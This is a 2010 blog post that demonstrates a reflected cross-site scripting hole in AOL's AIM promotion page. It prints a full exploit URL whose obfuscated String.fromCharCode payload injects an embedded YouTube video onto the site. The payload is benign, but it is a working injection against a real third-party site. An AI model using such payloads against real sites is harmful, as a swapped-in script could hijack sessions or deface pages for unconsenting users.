search
Carter Cole LinkedInCarters Twitter PageCarter Cole on Facebook Carter Coles RSS

Thursday, August 26, 2010

Attack demonstration of XSS hole in AOL's personalized email landing page

Heres my video about exploiting cross site scripting attacks in the wild, I found a hole in AOL's promotion page and had my video playing on their domain in less than 5 min

See the attack and video live on the page

or watch below (ill have this link live as long as it works)

The javascript we inject is shown below

which url encodes to...
http://www.aim.com/features/aimandfacebook?aimID=carterkixass%3Cbr%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3E

This is a demonstration of a live attack meant for educational purposes only... if you want to see my copy is here: AOL XSS attack landing page If you are having issues with XSS attacks on your domain or would like help on securing your application, contact me id love to help

P.S. the tool I used to do string encoding is here

0 remarks:

Post a Comment

Link to this post if you found it usefull

Attack demonstration of XSS hole in AOL's personalized email landing page